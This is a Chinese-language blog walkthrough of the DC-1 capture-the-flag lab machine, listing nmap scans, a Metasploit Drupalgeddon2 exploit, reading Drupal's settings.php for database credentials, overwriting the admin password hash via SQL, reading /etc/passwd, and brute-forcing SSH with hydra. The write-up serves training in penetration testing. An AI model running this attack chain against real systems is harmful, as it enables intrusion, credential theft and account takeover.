DC-1

DC-1

1
2
nmap -sP 192.168.93.0/24#扫描局域网内的ip确定主机
nmap -sV 192.168.93.79#扫描靶机开方的端口
image-20210501205243182

发现开放三个端口,我们先访问80端口。

看到了Drupal,启动msfconsole,并寻找相关攻击模块。

1
2
msfconsole
search Drupal
image-20210501210326675

选择最新的模块进行攻击。

1
2
3
use exploit/unix/webapp/drupal_drupalgeddon2
set RHOST 192.168.93.79
run

image-20210501210651791

拿到meterpreter会话,列出当前文件,发现flag1.txt。

1
2
ls
cat flag1.txt
image-20210501211042144

根据该提示,我们去查询相关配置文件,Drupal的配置文件存于 ./sites/default/settings.php

image-20210501211638214

拿到flag2,同时发现数据库账号和密码。

输入shell切换壳。

登陆数据库发现没有回显,可能是因为不是交互式shell。

利用python触发交互示shell。

1
python -c 'import pty;pty.spawn("/bin/sh")'

登陆数据库。

image-20210501212835144

进入数据库drupaldb,查表,进入users,再把东西都列出来,发现admin和其密码。

修改admin密码:

1
php scripts/password-hash.sh 123456#返回shell输入
1
update users set pass="$S$D0EhkXn49TFszpwkBNaPbktisjrdSzUqOwL3pbTcUZ5YfsCyd4Q0" where uid=1;#mysql登陆数据库后使用

修改后登陆网站,找到flag3

image-20210501221735813

根据提示返回终端,查找相关文件。

1
cat /etc/passwd

image-20210501222739893

这里的flag应该是一个用户,之前扫描端口有一个ssh服务的端口,猜测用该需要用ssh登陆该用户,但不知道密码,所有需要爆破。

1
hydra -l flag4 -P /usr/share/john/password.lst 192.168.78.147 ssh -vV -f

得到密码为orange,进行ssh连接。

1
ssh flag4@192.168.93.79
image-20210501223520505

根据提示得知flag可能在root目录下,但尝试进入失败。

查看当前用户

image-20210501223759447

想办法提升为root。

这里使用SUID提权。

image-20210501224206065

成功提升为root用户。

最后找到flag。

image-20210501224354960
redteam
-web -DC

本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!